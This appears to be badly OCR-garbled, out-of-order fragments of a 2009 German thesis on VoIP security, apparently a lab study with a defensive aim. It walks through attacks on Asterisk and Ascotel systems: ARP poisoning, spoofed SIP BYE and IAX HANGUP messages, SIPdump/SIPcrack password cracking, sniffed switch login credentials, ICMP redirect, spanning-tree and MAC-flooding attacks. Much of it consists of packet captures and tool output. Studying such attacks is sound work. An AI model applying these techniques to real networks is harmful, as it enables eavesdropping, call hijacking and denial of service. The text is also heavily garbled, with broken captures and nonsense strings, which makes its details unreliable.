110. 5 142 909760 CompaliIn_Ob ad 96 Broadcast who has 10 1 1 1 Tell 10 1 1 241 506 142 910046 Netopia_21 79 14 compal n_0b ad 96 10 1 1 1 is at 00 0f cc 21 79 14 507 147 028341 Compal n_0b ad 96 Broadcast who has 10 1 1 1 Tell 10 1 1 241 508 147 028762 Netopia_21 79 14 compal n_0b ad 96 10 1 1 1 is at 00 0f cc 21 79 14 509 151 210273 CompaliIn_Ob ad 96 Broadcast who has 10 1 1 1 Tell 10 1 1 241 510 151 211055 Netopia_21 79 14 cCompaliIn_Ob ad 96 10 1 1 1 is at 00 0f cc 21 79 14 sii 586 10 1 1 2 Mobile IP ertisement 255 255 255 255 Frame 504 50 bytes on wire 50 bytes captured Ethernet II src vmware_55 dd b4 00 0c 29 55 dd b4 Dst Broadcast ff ff ff ff ff ff Internet Protocol Src 10 1 1 2 10 1 1 2 Dst 255 255 255 255 255 255 255 255 Internet Control Message Protocol Type 9 Mobile IP Advertisement code 0 O checksum OxeOOb correct Number of addresses 1 Address entry size 2 Lifetime 30 minutes Router address 10 1 1 2 Preference level 999 Epe Die zwei Nachrichten Router Advertisement und Router Solicitation erzeugen und ndern jeweils die Eintr ge in der Hosttabelle der Hosts Untenstehend ist die Hosttabelle von Host 10 1 1 112 zu sehen der soeben gestartet wurde In dessen Hosttabelle wurde neu eine Defaultroute mit Anzahl 1 h chste Priorit t eingef gt Auch der Standardgateway wurde neu auf 10 1 1 2 gesetzt F WINDOWS system32 omd exe x
111. 5b421e9ec32bfe0519751c341e 10 1 1 101 CSeq 102 INVITE User Agent Asterisk PBX Max Forwards 70 Date Mon 05 Jan 2009 17 13 58 GMT Allow INVITE ACK CANCEL OPTIONS BYE REFER SUBSCRIBE NOTIFY pe Content Type application sdp Cantant tanath 757 oO Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 69 Berner Fachhochschule Technik und Informatik Software Schule Schweiz Um die BYE Nachricht zu senden geht der Angreifer wie folgt vor SiVuS ffnen Tab SIP ausw hlen und den Tab Message Generator selektieren Dann sind die Argumente gem ss der zuvor mittels Wireshark Trace gesnifften Daten einzugeben Folgende Argumente Settings sind vorzunehmen und haben im Einzelnen folgende Bedeutung gt gt UDP die Nachricht soll ber UDP gesendet werden gt gt IP Adresse SIP Proxy Server Asterisk PBX wo der User angeschlossen ist gt gt Definiert Protokoll und Adresse f r die R ckantwort des Requestes Method gt gt Es soll eine BYE Nachricht gesendet werden Transport Called User gt gt 7111 soll die Nachricht empfangen Domain Via To gt gt SIP Adresse des Empf ngers From gt gt SIP Adresse des Senders From Tag gt gt From Tag Identifikation des Absenders Call ID gt gt Eindeutige Identifikation des Gespr ches Cseq gt gt 2 BYE das Gespr ch soll beendet werden WG SiVus The VoIP Vulnerability Scanner v1 10 SIP Compone
112. 6 2 Technik und Funktionsweise Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 97 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz Sobald vnak einen Registration Request REGREQ eines IAX Clients detektiert geht es darum so schnell wie m glich eine Registration Reject REGREJ Nachricht an den IAX Client zur ckzusenden Wichtig dabei ist dass diese Nachricht vor der Registration Authentification REGAUTH Nachricht des Asterisk Proxy Servers beim IAX Client eintrifft Ist die Registration Authentification REGAUTH Nachricht des Asterisk Proxy Servers fr her beim IAX Client wird die Registration Reject REGREJ Nachricht des Angreifers ignoriert und verworfen und der IAX Client meldet sich ordnungsgem ss am Asterisk Proxy Server an 3 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer horcht das Netzwerk ab IAX Client 4131 mit der IP Adresse 10 1 1 151 sendet einen Registration Request REGREQ an den Asterisk Proxy Server Es spielt dabei keine Rolle ob es sich dabei um die per default konfigurierte periodische oder die erstmalige Registrierung beim Aufstarten der Applikation handelt Damit der Angreifer die im Netzwerk ausgetauschten INVITE Nachrichten empfangen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Bemerkung Obschon vnak nicht in BackTrack3 enthalten ist wird es aus dem Term
113. 65 49 8b ARP 10 1 1 199 is at 00 11 22 33 44 55 363167_ 10 1 1 199 10 1 1 191 TCP 13167 gt telnet ACK Seq 1 Ack 1 win 4096 47 10 432860 10 1 1 191 10 1 1 199 TELNET Telnet Data 432988 10 1 1 199 10 1 1 191 TCP 13167 gt telnet ACK Seq 1 Ack 18 win 409 437047 10 1 1 199 10 1 1 191 TCP o gt telne ACK eq l Ack 19 win 409 TCP telnet gt 13167 ACK Seq 19 Ack 2 win 409 465251 10 1 1 191 10 1 1 199 481067 Cimsys_33 44 55 BayNetwo_65 49 8b ARP 10 1 1 199 is at 00 1e ec 0b ad 96 4 10 506300 Compal n_0b ad 96 Broadcast z ARP who has 10 1 1 1 Tell 10 1 1 199 Der Angreifer hat in seinen ersten Aufzeichnungen gesehen dass ein Zugang zur Managementkonsole m glich ist Im Wissen der m glichen Sicherheitseinstellungen der Switche denkt er sofort an eine eingeschaltete IP Security im Switch In den zuvor gemachten Aufzeichnungen hat der Angreifer auch gesehen mittels welcher IP Adresse Zugang zur Managementkonsole erreicht wurde Somit muss er beim Verbindungsaufbau zum Switch diese IP Adresse gespooft mitsenden Dies wird mittels dem Tool sTerm bewerkstelligt Unter IP Spoofing tr gt er die zu spoofende IP Adresse ein Ab diesem Zeitpunkt sendet der Angreifer im Header s mtlicher IP Pakete die gespoofte IP Adresse 10 1 1 190 mit Device NPF_ BE0913 10 1 1 199 255 255 0 0 I BB Device NPF_ 41 9223B 255 255 255 255 255 255 25 ERY Device NPF E2614F7 0 0 0 0 0 0 0 0 gt lt m r Win
114. 7 gt tag ac6e1bba e1f6 4494 97ad 2e815bfb7729 To 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt tag as16da7f0e Call ID ac6e4bO1 e1f6 4494 af41 fal3a29ddf91 CSeq 1 REGISTER User Agent Asterisk PBX Allow INVITE ACK CANCEL OPTIONS BYE REFER SUBSCRIBE NOTIFY Expires 0 Date Sun 21 Dec 2008 08 50 40 GMT Content Length 0 REGISTER sip 10 1 1 101 SIP 2 0 Via SIP 2 0 UDP 10 1 1 107 15002 branch ae 1 da4ce e 1 f6 4494 a408 91756b928bd7 From 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt tag ac6e1bba e1f6 4494 97ad 2e815bfb7729 To 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt Call ID ac6e4b01 e1 f6 4494 af4 1 fal 3a29ddf91 CSeq 2 REGISTER Max Forwards 70 Expires 86400 Content Length 0 Via SIP 2 0 UDP 10 1 1 107 15002 branch ae 1 da4ce el f6 4494 a408 91756b928bd7 received 10 1 1 107 From 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt tag ac6e1bba e1f6 4494 97ad 2e815bfb7729 To 4129 10 1 1 29 lt sip 4129 10 1 1 29 10 1 1 107 gt tag as 16da7f0e Call ID ac6e4b01 e1 f6 4494 af4 1 fal 3a29ddf9 1 CSeq 2 REGISTER User Agent Asterisk PBX Allow INVITE ACK CANCEL OPTIONS BYE REFER SUBSCRIBE NOTIFY Expires 3600 Contact lt sip 4111 10 1 1 121 gt expires 3600 Date Sun 21 Dec 2008 08 50 40 GMT Content Length 0 closing socket closing results file bt kkk Berner Fachhochschule Technik und Informatik Software Schule Schweiz 2 8 4 Folgende Auswirkunge
115. 77 Ethernet II 5 068686 e9 15 lt d 5 38 f4 ee 5d 87 96 f5 a3 0x2277 Ethernet 5 068769 ba f1 05 13 bc 34 ds 37 f4 1e b1 31 0x2277 Ethernet 5 068847 a4 3c 6f d5 d7 a0 Ox2277 Ethernet 71302 5 069008 5e 93 f6 3d c9 f2 31 be 2f 85 b6 f9 0x2277 Ethernet II 71304 5 069331 fFfe d0 a9 a4 d4 cf 3e 6f 4d 53 8e 64 Ox2277 Ethernet 71305 5 069411 46 8d 72 07 27 1F 68 6d a1 2a 53 fb 0x2277 Ethernet II Frame 71300 214 bytes on wire 214 bytes captured Ethernet II Src Aastra_19 93 a7 00 08 5d 19 93 a7 DSt Dell_f0 22 43 00 14 22 Destination Dell_f0 22 43 00 14 22 f0 22 43 amp source Aastra_19 93 a7 00 08 5d 19 93 a7 Type IP Ox0800 Internet Protocol Src 10532 3 129 Go 4 3 3229 OSE 120 131 1 101 GO 1 1 103 User Datagram Protocol src Port hbci 3000 DSt Port 18212 18212 Real Time Transport Protocol Bei diesem Angriff wurden Versuche mit folgenden Switches gemacht D LINK DES 1024 Allied Telesyn AT 8326 GB Bay Stack 303 Tenda TWL 108R Zyxel Desktop Ethernet Switch S mtliche dieser Switche fielen in den Failopen Mode und agierten danach als HUB 6 3 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Dieser Angriff zielt auf die Vertraulichkeit der im Netzwerk gesendeten Daten ab Der Angreifer kommt dadurch zum Beispiel in Kenntnis von Registrierungsdaten Benutzernamen und Passwort Gespr chsinformationen wer telefonier
116. 9 ce7e879aaabc5ef63059573502050e79 Select which entry to crack 1 3 3 Generating static MDS hash 53231537d58030c6d7b4509936517f27 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 51 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Nach erfolgreichem Cracken der MD 5 Hashwerte werden diese automatisch im Ausgabeverzeichnis logins dump durch die Passw rter in Klartext Plaintext ausgetauscht logins dump gedit Datei Bearbeiten Ansicht Suchen Werkzeuge Dokumente Hilfe D ws i B A g Neu ffnen Speichern Drucken i Einf gen Suchen Ersetzen logins dump amp 10 1 1 151 10 1 1 101 4119 asterisk REGISTER s1p 10 1 1 101 639b46a1 PLAIN 13579 110 1 1 151 10 1 1 101 4119 asterisk REGISTER sip 10 1 1 101 29d838ec PLAIN 1357 2 6 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Mit dem Sniffen der Registrierungsdaten und dem Cracken des Passwortes kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit denselben Registrierungsdaten ins Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gemacht Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Auch kann er sich sowohl f r ankommende wie auch f r abgehende Gespr che unter falscher Identit t am Term
117. Attack Kit iSEC Partners Copyright 2007 lt c gt http www isecpartners com Written by Zane Lackey Call Hangup attack completed succesfully against host 10 1 1 151 Call Hangup attack completed succesfully against host 10 1 1 151 Call Hangup attack completed succesfully against host 10 1 1 151 Call Hangup attack completed succesfully against host 10 1 1 151 RK Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 101 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz In Paket Nr 12405 sendet der Angreifer eine gespoofte HANGUP Nachricht an den IAX Client 4131 Dieser best tigt in Paket Nr 12406 den Empfang Von diesem Zeitpunkt an ist bei IAX Client 4131 in dessen H rer nichts mehr zu h ren Dennoch bleibt sein Sprachkanal offen stehen und er sendet weiter Sprachpakete an User Agent 4111 User Agent 4111 bekommt von all dem nichts mit l sst auch seinen Sprachkanal offen und sendet weiterhin Sprachpakete an IAX Client 4131 Dieser h rt aber infolge des Angriffes nichts mehr File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 12403 95 157406 vmware_55 dd b4 Broadcast ARP Who has 10 1 1 151 Tell 10 1 1 111 12404 95 157542 Intelcor_07 f3 50 vmware_55 dd b4 ARP 10 1 1 151 is at 00 1c c0 07 f3 50 12405 95 157779 10 1 1 101 31021715131 IAX2 TAX source call 3 timestamp 62023ms HANGUP Frame
118. Benennung Angriffe Analyse Angriff Analyse gegen 6 9 1 z ICMP Redirect Integrit t shite ernennen Vertraulichkeit Eingesetztes Tool Verf gbarkeit Sing Downloadlink Quelle des Tools Schweregrad 1 leicht 6 schwer Installation Tool Anwendung Tool Erforderliche Vorkenntnisse Gefahrenpotential 1 kleine Gefahr 6 grosse Gefahr Gefahr f r Angriffsziel Wert X X X Ziel Angriff Analyse Kenntnis des Inhaltes kommt Der Angreifer sendet dem Angriffsziel eine gespoofte ICMP Redirect Nachricht um ihm einen neuen Default Gateway mitzuteilen Somit kann der Angreifer eine MitM Man in the Middle Attacke gegen das Ziel ausf hren Das Angriffsziel lenkt nach erfolgtem Angriff s mtlichen Datenstrom welcher ins Internet sollte ber den Gateway des Angreifers welcher dabei die Daten mittels Netzwerkmonitor aufzeichnet und so in Schutz gegen Angriff Analyse Siehe Massnahmen ICMP Redirect Kapitel 8 5 8 Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Kommentar Dieser Angriff ist identisch mit IRDP Spoofing wurde aber der Vollst ndigkeit wegen auch aufgef hrt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 165 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz 6 9 2 Technik und Funktionsweise Die ICMP Internet Control Message Protoc
119. DSt 10 1 1 199 10 1 1 199 User Datagram Protocol Src Port iax 4569 DSt Port iax 4569 Inter Asterisk exchange v2 Packet type Full packet 1 000 0000 0000 0011 Source call 3 000 0000 0000 0011 Destination call 3 Oras 2 2 2 Retransmission False Timestamp 12 Outbound seq no O Inbound seq no 1 Type IAX 6 IAx subclass REGAUTH 14 Information Element Authentication method s 0x0002 Information Element challenge data for MD5 RSA 240491225 IE id challenge data for MD5 RSA OxOF Length 9 challenge data for MDS RSA 240491225 4 Information Element Username peer or user for authentication 4131 E Daa Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 91 eee Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz Untenstehend sendet der AX Client 4131 in Paket Nr 20 den aus Passwort und Challenge gebildeten MD5 Hashwert fd18bs67f8eb3275d6e676602b3f8ac9 an den Asterisk Proxy Server zur ck une Wireshark ones Le eee File Edit View Go Capture Analyze Statistics Help Filter Expression Clear Apply No Time Source Destination Protocol Info Frame 20 94 bytes on wire 94 bytes captured Ethernet II Src lt compal in_0b ad 96 00 1e ec 0b ad 96 DSt Dell_fO 22 43 00 14 22 70 22 43 Internet Protocol src 10 1 1 199 i0 1 1 199 DSt 10 1 1 101 10 1 1 101 DERBE Znter Asterisk exchange v2 Packet typ
120. Damit der Angreifer das Netzwerk nach RTP Paketen abhorchen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Damit die gespooften Pakete dem Angriffsziel eingeschleust werden k nnen muss es so aussehen als ob diese von dem anderen Gespr chspartner auf der Gegenseite abgesendet worden w ren Da beim Asterisk Proxy Server auch die RTP Sprachpakete immer ber den Asterisk Proxy Server selbst ausgetauscht werden m ssen die gespooften Pakete so aussehen wie wenn sie vom Asterisk Proxy Server selbst k men Untenstehender Wireshark Trace zeigt ber welche Ports der Asterisk Proxy Server und das Angriffsziel f r dieses laufende Gespr ch kommunizieren Diese Daten verwendet der Angreifer zur Konfiguration von rtpmixsound gesinfft Verbindungsaufbau pcap File Edit View Go Capture Analyze Statistics Help Filter v Expression Clear Apply No Time Source Destination Protocol Info 519 20 410206 10 1 1 101 10 1 1 241 RTP PT ITU T G 711 PCMU SSRC OX53F9E4DC Seq 1986 Time 18240 Frame 519 214 bytes on wire 214 bytes captured Ethernet II src Dell_f0 22 43 00 14 22 f0 22 43 Dst Compal n_0b ad 96 00 1e ec 0b ad 96 Internet Protocol Src 10 1 1 101 10 1 1 101 Dst 10 1 1 241 10 1 1 241 User Datagram Protocol Src Port 14354 14354 Dst Port 50076 50076 Source port 14354 14354 Destination port 50076 50076 Length 180 Checksum 0x5169 correct
121. ENS Name query NB TESTNETZCITRIXI 1c gt Br re 8 85 9102 10 1 1 101________10 1 1 191_ U EE __dab sti c gt htt ou TEEN ae Saree Gere IL 5 x ln eS 36 86204 5 10 1119 10 1 1 101 Tcr http gt dab sti MEME 2455 G38 72276 LOS i DRG Tack seqe Da 5 36 922448 10 1 5 Frame 422 532 bytes on wire 532 bytes captured Ethernet II Src Dell_f0 22 43 00 14 22 f0 22 43 Dst BayNetwo_65 49 8b 00 00 81 65 49 8b Internet Protocol src 10 1 1 101 10 1 1 101 Dst 10 1 1 191 10 1 1 191 Transmission Control Protocol src Port imgames 1077 Dst Port http 80 seq 333 Ack 119 Len 478 Hypertext Transfer Protocol index htm HTT Dae ew Accept image gif image x xbitmap image jpeg image pjpeg application x shockwave flash application wnd 1 Referer http 10 1 1 191 logon html r n Accept Language dern Accept Encoding gzip deflate r n User Agent Mozilla 4 0 compatible MSIE 6 0 windows NT 5 1 Sv1 NET CLR 2 0 50727 9 r n Host 10 1 1 191 r n connection Keep Alive yr n 3 Authorization Basic Twruywd1cjozyYxnjb3rR1ba r n Credentials Manager 3ascotel Der Angreifer ist somit jetzt im Besitz des Benutzernamen und Passwortes die es braucht um via Managementkonsole in die Konfiguration des Switches zu kommen Auch weiss er mit welcher IP Adresse auf die Managementkonsole zugegriffen worden ist WICHTIGE BEMERKUNG Zum Zeitpunkt als obige Aufzeichnung mit Cain amp Abel Wireshark gemacht wurden wa
122. Filter a on u Bu Expression Clear Apply si Frame 349 214 bytes on wire 214 bytes captured Ethernet II SEE Dell f0 22 43 00 14 22 f0 22 AI Dst Netopia_e3 9d a8 00 0Of cc 6 8 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Oben gezeigte Angriffe zielen auf die Vertraulichkeit und Verf gbarkeit ab Einerseits kann eine MitM Man in the Middle Attacke ausge bt werden bei der s mtliche Daten eines Netzsegmentes ber den PC des Angreifers gelenkt werden k nnen Dieser kommt in Kenntnis des Inhaltes von Daten respektive Medienstreams Je nach Inhalt dieser Daten k nnen die so erfsnifften Informationen f r weitere Angriffe eingesetzt werden Andererseits ist auch eine DoS Denial of Service Attacke auf die Verf gbarkeit der Hosts IP Telefone und VOIP Server m glich Der Angreifer kann den Angriffszielen einen nicht existierenden Default Gateway mitteilen Dadurch werden die f r ins Internet bestimmten Daten respektive Sprachstreams ins Leere umgelenkt Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 164 eo Berner Fachhochschule F Technik und Informatik Software Schule Schweiz http sourceforge net projects sing Das Tool ist ebenfalls in BackTrack3 enthalten Hinweise zu Installation Verf gbarkeit Das Tool ist in BackTrack3 enthalten Installationsanleitung zu BackTrack3 siehe Kapitel 1 5 2
123. Flod 193 8 5 13 Massnahmen gegen LAND Flood 193 8 5 14 VLAN und VOIP 193 8 5 15 IDS 193 8 5 16 Redundanz 194 8 5 17 Sichere Netzwerkkomponenten 194 8 5 18 Zugangs und Zugriffsschutz 194 9 Zusammenfassung Pers nliche Schlussbemerkungen 195 10 Ausblick 197 11 Fazit 197 12 Quellen Angaben 198 13 Glossar 199 14 Anhang 207 14 1 Pflichtenheft 207 14 2 Festlegung der VOIP Angriffe Realisierungskonzept 223 14 3 Arbeitslog 224 14 4 Statusberichte 227 14 4 1 Statusbericht Nr 1 227 14 4 2 Statusbericht Nr 2 228 14 4 3 Statusbericht Nr 3 229 14 4 4 Statusbericht Nr 4 230 14 4 5 Statusbericht Nr 5 231 14 4 6 Statusbericht Nr 6 232 14 4 7 Statusbericht Nr 7 233 14 4 8 Statusbericht Nr 8 234 14 4 9 Statusbericht Nr 9 235 14 5 Diverser Mailverkehr 236 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 10 eo Berner Fachhochschule tee Technik und Informatik Software Schule Schweiz 1 Einleitung VOIP hat sich in den letzten Jahren am Markt immer mehr durchgesetzt das Telefonieren ber Computer Netzwerke geh rt mittlerweile schon fast zur Selbstverst ndlichkeit Wo fr her die Kommunikation mit ISDN oder analoger Technik ber getrennte und separate Leitungen statt gefunden hat wird heute f r VOIP das gleiche Medium genutzt welches auch f r die Computer und Internetkommunikation eingesetzt wird Doch wie sicher ist eigentlich VOIP im Umfeld dieses shared Mediums Wie sicher sind die heute dazu eingese
124. IST Situation Legende Tendenz suf Kurs 7 Verbsserung vom Kurs leicht gleich bleibend sbgewichen 7 stark vom Kurs abgewichen Vers chiechte ung Ubersicht der Arbeiten Abges chlossene Besprechung mit Experte am 18 1 2009 Arbeiten 8 Sitzung mit Betreuer am 20 1 2009 an Protok oll Angriffe suflAX und LAN abgsschlossen Laufende offene Reslsierung Arbeiten Angriffe auf die PBX Ascotel sind im Gange Dokumentation Die get tigten Angriffe und Analysen werden laufend dokumentiert und die Resultate festgehalten Ebenfalls wird parallel dazu ein Arbeit Log gef hrt Sitzung mit Betreuer 9 Sitzung mit Betreuer steht am 3 2 2009 sn Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 233 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 14 4 8 Statusbericht Nr 8 Projektangaben Titel der Arbeit VOIP Security Nummer MAS 06 02 20 Datum Ststusbericht Dienstag 3 Februar 2009 Projektbeteiligte Auftsegebe Selbstcingebrschtes Thems Berever Kurt J rmenn Aastra Telecom Schweiz AG Experte Mathiss Engel Casssrius AG Diplomand Autor Ststusbericht Stefan Sch r Asstra Telecom Schweiz AG Zusammenfassung IST Begr ndung Be gis Posten Termine Im Zeitplan Quslit t Genauigkeit bei Dokumentation angestrebt Sehr gute Motivation Ende kommt in Reichweite rn IST Situation auf Kurs vom Kurs leicht sbgewichen stark vom Kurs abgewichen Laufe
125. Kleinschreibung ergeben keinen Sinn und sind mindestens 8 Zeichen lang Sichere Passw rter stehen auch nicht auf einem Post it Nachrichtenzettel unter dem Telefonie Terminal oder der PC Tastatur Siehe Massnahmen VLAN und VOIP Kapitel 8 5 14 Siehe Massnahmen TLS und SIP Kapitel 8 1 4 Siehe Massnahmen IPSec und SIP Kapitel 8 1 5 Kommentar SIPcrack beinhaltet eigentlich 2 Tools SIPdump und SIPcrack SIPdump horcht das Netzwerk nach SIP Registration Requests also MD5 Hashwerten ab SIPcrack f hrt dann gegen die mit SIPdump gesnifften MD5 Hashwerte die Dictionary Attacke aus um das Passwort ausfindig zu machen Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 49 oo Berner Fachhochschule eee Technik und Informatik Software Schule Schweiz 2 6 2 Technik und Funktionsweise Siehe Kapitel 2 5 2 2 6 3 Ausgangssituation Ablauf und Bedingungen f r Angriff Der Angreifer h rt das Netzwerk nach bertragenen MDS ab In diesem Beispiel registriert sich gerade User Agent 4119 am Asterisk Proxy Server 10 1 1 101 Damit der Angreifer die im Netzwerk ausgetauschten MDS Hashwerte sniffen kann muss die Bedingung gegeben sein in einem geswitchten Netzwerk Daten abhorchen zu k nnen Siehe Kapitel 1 4 Im Terminalfenster von BackTrack3 oder aus Ubuntu wird das Tool mit folgenden Argumenten gestartet sudo sipdump i ethO logins dump Die Argumente im Einzelnen stehen wie folgt f r sudo sipdump
126. L 1 http de msn com ocid iefvrt 18 01 2009 15 28 51 66 235 138 18 10 1 1 101 DE Homepage 11 N http de msn com ocid iefvrt 18 01 2009 15 28 53 65 55 197 254 10 1 1 101 iefyrt 1089 HTTP 1 1 http fde msn com ocid iefvrt 18 01 2009 15 28 58 65 55 197 115 10 1 1 101 iefvrt 1401 HTTP 1 1 http de msn comj ocid iefwrt 6 009 15 29 19 0 9 Manage ascote http 10 1 1 191 logon html 18 01 2009 15 29 20 10 1 1 191 10 1 1 101 Manager 3ascotel http 10 1 1 191 pagestindex htm 18 01 2009 15 29 20 10 1 1 191 10 1 1 101 Manager 3ascotel http 10 1 1 191 pages index htm 18 01 2009 15 29 20 10 1 1 191 10 1 1 101 Manager 3ascotel http 10 1 1 191 pages index htm 4 nl lanan RANAS MAAN TA in EEEE ame inb anh Lira Jide nun Lit tde onne num eid talk gt Lost packets 0 Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 157 eee Berner Fachhochschule Technik und Informatik Software Schule Schweiz Zur Vollst ndigkeit wird untenstehend aufgezeigt dass der Username und das Passwort auch durch eine Wiresharkaufzeichnung h tten ermittelt werden k nnen Die Daten wurden in Klartext ber das Netzwerk gesendet TRacae wirdsehak pcap Wireshark Ele Edit Yiew Go Capture Analyze Statistics Help Saeae et six gt 32 A Sa 72 EB aade Aa ya E Eilter Expression Clear Apply No Time Source Destination Protocol Info 420 36 819730 10 1 1 101 i LOS1ZPSS 255 000 ITTEN
127. Lost packets 0 Die Datenpakete der ausgew hlten Angriffsziele werden jetzt ber den PC des Angreifers und erst dann zu ihrem effektiven Bestimmungsort geleitet Gut sichtbar ist dies an der Anzahl der Pakete die ber den PC des Angreifers geleitet werden Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 17 oo Berner Fachhochschule bee Technik und Informatik Software Schule Schweiz B File View Configure Tools Help alp Gch RR o 2 9mmB3509832 OF e Recoder Newe Sniffer Ar Cracker a Traceroute Im CCDU x Wireless ES Query SE IP address MAC address Packets gt lt Packets MAC address IP address APR Cert A Poisoning 1014151 001CC007F350 32394 32093 001422F02243 10 1 4 101 2 APR DNS B APR SSH 1 0 Mittels eines Netzwerkmonitors wie Wireshark hat nun der Angreifer die M glichkeit die ber seinen PC ausgetauschten Datenpakete aufzuzeichnen und zu analysieren um diese f r weitere Angriffe verwenden zu k nnen 1 5 Installation VMware Server und Back Track3 Wie oben schon einmal geschrieben basieren viele Angriffe in diesem Dokument auf Tools welche in der Netzwerk Tools Sammlung Back Track3 enthalten sind BackTrack3 ist eine von einer Live CD einem USB Stick oder bers Netzwerk bootende Linux Distribution zur berpr fung der Sicherheit einzelner Rechner in Netzwerken sowie der Gesamtsicherheit des Netzwerks Es hat sich in dieser Arbeit gezeigt dass e
128. NG Die Firrmvare kann nicht auf eine fr here Version zur ckgesetzt werden Downgrade 1 Telefon anschliessen binden Sie das Netzteil mit einem Ethemet Kabel J45 mit dem LAN Port 2 IP Adresse des 53i herausfinden Dies kann auf zwei Arten geschehen te Pfeil nach rechts a Acimin Pas im Abrollmen bis zum Eintrag 9 Network Settings und drucken ort 22922 ein und klicken Sie auf 21P gehen Sie im Abrollmen bis zum Eintrag 11 Phone Status dir cken Sie auf hts und klicken Sie auf 1 Network Port Dr cken Sie nun die Taste f r IP Adicir 3 Auf das Ss E des 53i zugreifen 7 Wed S n in der Adresszeile die IP Adresse des 53i cin rt 22992 ein en geben als Benutzernamen user ein und lassen Sie das 2 4 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Der Angreifer kommt an Informationen welche nicht f r ihn bestimmt sind Registrationsinformationen Gespeicherte Rufnummern Kurzwahltasten Einsicht in Anruflisten resp Wahlwiederholungslisten Mit dem Auslesen der Registrierungsdaten kann ein Registrations Hijacking gemacht werden das heisst der Angreifer kann ein anderes Terminal mit den selben Registrierungsdaten ins Netzwerk bringen Ankommende und abgehende Verbindungen werden ab diesem Moment ber dieses Terminal gemacht Somit kommt der Angreifer auch in Kenntnis ankommender Anrufe welche beim Angriffsziel rufen sollten Auch kann er
129. NMP Segment Hello s Synopti SONMP SONMP FlatNet Hello Diplomarbeit VOIP Security 19 02 2009 S Sch r MAS 06 02 20 Seite 149 oo Berner Fachhochschule teem Technik und Informatik Software Schule Schweiz Untenstehendes Bild zeigt die dynamische Konfiguration von Spanning Tree des Switches 10 1 1 191 nach oder w hrend des Angriffes Als Destignated Root ist die MAC Adresse der Netzwerkbr cke des Angreifer PC s eingetragen Das heisst der nach Kosten berechnete Pfad zeigt zum Angreifer PC ber diesen werden die Datenpakete gesendet oder empfangen und nicht wie zuvor an den Switch A gesendet IP address 10 1 1 191 Name Bo3BE Location Bem w baynetworks com Contact 5 summa 14 Jan 109 20 35 16 x i maY a Wen Configuration Spanning Tree ElConfiguration Clear Input Apply New Settings System Reset Upgrade Please click Refresh button after applying new settings to update configuration information Spanning Tree Refresh Switch Spanning Tree Parameters oe Aging Ti 2 300 iiterin ging Time sec Bridge Priority 32758 2lsecurity Bridge Hello Time sec 2 Password ei es Bridge Max Age sec 20 Network Access Bridge Forward Delay sec 15 Seinen Designated Root 0 02 1e e5 d5 ec 49 Ping Telnet Root Port 13 MAG Address Tabi Part Cost 1700 nee Hello Time sec 2 Gil statistics Max Age Time sec 20 Traffic For
130. O o o ADODO e woe a ee N N 1 Job fk fen fb ob fd S Joh fk fd AC coi SSGSSSSKHOSOHKKRK OSES QOMUMINN NNO NNNNNNNNNN rrr SOC errr rarer are NH NNNNNN nennen wanna a DON TA D INNNEMMMGe Niet DON Ha Joh fh fo fbf fb fm fh pak mJ AJ A od pa I 6 08 CD N r NNNe Joh fh fof fb fk m oh pak fo m a JA Po palk mk fk bd A a a a A aan et a 8 B A 16 18 18 ak i 2 Fay 2 27 24 24 24 2 P11 CS SG 1 1 0 k ph pak puk pak pak E E E t Anna Ge ara N o a NNDO N Wn v N m 255 255 255 255 255 255 255 255 Standardgateway fob fk fob fk fk fob pk fk od VOOLA OOO DODA ss A IN Poh FIND Ph fab pak N ak ak pak Fk pab N jak pah pah fak fa LE fob fob fh fk fh fo fab fak pak OOO SSOKOSOHKKOORSEOOR ot NOFA fe IN Pk pak N ak ak pak Fk pab N oh tlk ND Fh C ENNNNOOOVNNNNNNNNNNNOO Y a a Kunnnssasnnnnnnnnmnaa 3 SNINNSSSSNMNNNNSHRNAHR St ndige Routen Keine 6 9 4 Folgende Auswirkungen und Gefahren f r das Angriffsziel gehen von diesem Angriff aus Oben gezeigte Angriffe zielen auf die Vertraulichkeit und Verf gbarkeit ab Einerseits kann eine MitM Man in the Middle Attacke ausge bt werden bei der s mtliche Daten eines Netzsegmentes 